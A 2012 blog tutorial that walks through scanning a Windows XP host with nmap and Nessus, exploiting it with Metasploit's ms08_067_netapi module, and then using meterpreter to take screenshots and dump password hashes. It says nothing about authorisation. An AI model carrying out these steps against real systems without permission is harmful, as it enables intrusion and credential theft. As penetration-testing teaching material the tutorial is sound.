Tuesday, December 4, 2012

Identify, scan & exploit a Windows system

Hello everyone,

The following tutorial is based on a realistic scenario, and I'm gonna show you how to identify, scan and exploit a Windows XP OS.
The victim is running Windows XP and the attacker Linux Mint 13 (Maya).
   
So, the first step is to identify the alive hosts in the attacked network. An alive host is a host which responds to an ICMP echo request (ping). Keep in mind that a host which drops ICMP will look dead to a plain ping scan, so an empty result does not prove an address is unused. For further information about ICMP requests, just have a look here ( http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol ).

Let's say that the network is 10.50.97.0/24. Now, to find the alive hosts you have to launch nmap ( http://nmap.org/ ) and scan the whole range by typing the following command:

$ sudo nmap -v 10.50.97.0/24

The output should be something like this:

The above command starts Nmap and performs host discovery (ping) plus a port scan of every address from 10.50.97.0 to 10.50.97.255. If you only want the ping sweep, replace -v with -sn.

   
After finding the alive hosts we have to identify their operating systems. To do this just type:

$ sudo nmap -O [alive host's ip]

With the above command you ask Nmap for operating system detection (-O). My output looks like this:

  
After a quick check of the output we can easily learn the target's OS.

After identifying the host we have to scan it for open ports, services and vulnerabilities. You can check for open ports and services by typing:

$ sudo nmap -sV [target's ip]

The above command probes the open ports to determine service and version information (-sV).
Now, after gathering this useful information, we are gonna perform a vulnerability scan to identify open ports, more details and common vulnerabilities which we are gonna try to exploit later.

To do this, we have to launch a vulnerability scan with the Nessus tool.

Wait a couple of minutes. After the vulnerability scan has completed, check the report.
OK! Here is the information we have:

1) Vulnerable host's IP
2) Target's operating system
3) Service information
4) Open ports, other information, vulnerabilities
 
The next step is to run the Metasploit Framework. With Metasploit we will exploit the vulnerabilities of the target.
So, after launching Metasploit we should select the exploit we need (check your Nessus report to find the exploit name). In this case, I'm gonna use the "ms08_067" exploit. To do this, type in the Metasploit console:

"use exploit/windows/smb/ms08_067_netapi"

'use' is the command which tells Metasploit which exploit to use.

Now, type "show options" to see your exploit's options. Fill in the empty fields, such as "RHOST", "RPORT" etc., like in the following example:


After completing the above step it's time to run our exploit. To do this, just type "exploit" and wait for it to run.
 
  The following picture is an example of my metasploit session.

Once a meterpreter session is opened you can easily take screenshots of the target machine by typing "screenshot", dump password hashes by typing "hashdump", and do other cool things!
 
  Have your coffee and enjoy your meterpreter session!
 
  Thanks,
      Nikos Danopoulos
